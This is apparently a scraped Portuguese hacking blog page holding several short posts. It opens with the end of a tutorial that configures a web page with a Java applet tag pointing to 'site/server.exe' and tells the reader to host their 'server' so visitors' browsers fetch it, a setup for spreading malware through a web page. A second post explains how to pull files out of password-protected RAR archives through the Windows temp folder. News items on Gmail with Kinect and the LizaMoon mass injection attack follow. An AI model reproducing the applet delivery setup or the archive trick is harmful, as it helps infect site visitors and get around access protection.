<.param name="url" value="site/server.exe" />
<./applet>


ATENÇÃO: A parte que está destacada no código acima, será o endereço do seu server. Para substituir, você terá de hospedar seu server no site que eu indiquei acima.
Depois pegue o link hospedado e substitua pelo que está aí e salve assim:
index.html
Todos os Arquivos
- Agora já pode hospedar todos que você baixou!
Pronto... O Script já está configurado.

Creditos: Sindicato
Tutorial: Milorde

0
Abrir Arquivos .RAR Com Senha sem brute force

O tutorial a seguir funciona apenas para descompactar arquivos únicos dentro do .rar ou .zip como filmes .avi .mpeg executaveis .exe documentos .pdf .doc e outros. Se tiver vários arquivos o processo torna-se praticamente impossível de ser feito recomenda-se também que o arquivo seja de grande tamanho para facilitação do processo.

1° você recebe a triste notícia de que o arquivo tem senha



2° Finja que vai descompacta-lo em alguma pasta qualquer. Não digite nenhuma senha, aperte apenas o ok e ele começará a descompactar.



3° Agora começa a complicação.

Espere o arquivo chegar em aproximadamente 99% (pausa) para ajudar nesse processo de algumas travadas no pc para o processo de descompactação ir mais devagar.



4° Como da pra ver o arquivo está sendo descompactado porem não aparece na tela ainda. Mas em algum lugar ele tem que estar certo.

O lugar e esse.
C:/Documents And Settings/nome do seu pc/Local Settings/Temp

(a pasta muda dependendo do disco local, da lingua do seu windows e o nome do seu pc)

Você então achara um punhado de arquivos nos quais haverá uma ou várias pastas com nomes iniciados por Rar$ em um deles estará o arquivo no qual estará descompactando



5° Agora que você encontrou o arquivo faça uma cópia dele e se prepare para ser rápido.



6° Cole o arquivo em uma pasta bem distante daquele local como no meu caso desktop/new folder.


Enquanto o processo estiver carregando a cópia vá rapidamente no rar no qual você deixou pausado e aperte continue.

7° Cancele todos os erros que aparecerão e feche o rar

Como voc percebeu o arquivo do new folder está lá porém não completamente descompactado.

Agora volte lá no C:/Documents And Settings/nome do seu pc/Local Settings/Temp/Rar$.../ o arquivo 100% descompactado estará lá esperando por você.

0
Hacker recria brincadeira de 1º de abril e mostra Gmail com movimentos

Após uma brincadeira de 1º de abrilrealizada na sexta-feira pelo Google, em que seria possível controlar o serviço de e-mails Gmail por meio de movimentos no chamado "Gmail Motion", hackers do Institute of Creative Technologies (instituto de tecnologias criativas, em tradução) mostraram que é possível recriar a mentira, mas desta vez como algo sério.

Utilizando o Kinect, acessório do Xbox 360 que capta os movimentos dos jogadores e os transporta para os games, sem a necessidade de utilizar um joystick, eles conseguiram controlar o Gmail, usando movimentos para escrever, enviar, responder e encaminhar mensagens.

Os mesmos movimentos apresentados na brincadeira do Google, como fazer o gesto de lamber um selo para enviar um e-mail ou abrir um envelope para poder ler a mensagem são usados no sistema chamado de SLOOW, Software Library Optimizing Obligatory Waving (biblioteca de otimização de software de gesticulação obrigatória, em tradução). A intenção dos criadores era criar um nome engraçado para o sistema.

0
Ataque hacker atinge um milhão de páginas na internet

Mais de um milhão de páginas da internet foram afetadas por um sofisticado ataque hacker que inseriu códigos em sites, redirecionando usuários para uma operação fraudulenta de venda de software.

O ataque chamado de "inserção em massa", que é o maior do seu tipo já visto segundo especialistas, conseguiu inserir códigos maliciosos em sites ao obter acesso aos servidores que rodavam sua base de dados, de acordo com a companhia de segurança em tecnologia que descobriu o ataque.
A Websense, que encontrou evidências do ataque mais cedo esta semana, o apelidou de "LizaMoon", nome do site para o qual o código redirecionava usuários inicialmente.

Usuários podem ser que estão sendo redirecionados quando tentam visitar um dos endereços afetados, e podem fechar a janela sem maiores prejuízos, afirmou o administrador de segurança em pesquisas da Websense Patrik Runald.

O ataque afetou pequenos sites em larga escala, disse ele, mas não há indicadores de que páginas corporativas ou sites de governos tenham sido comprometidos.
O ataque pode levar algum tempo para ser combatido, alertou Runald, pois primeiro pesquisadores precisam identificar o software que foi comprometido, e as operadoras de websites precisam instalar softwares atualizados.
 
ST Informática | © 2010 by DheTemplate.com | Supported by Promotions And Coupons Shopping & WordPress Theme 2 Blog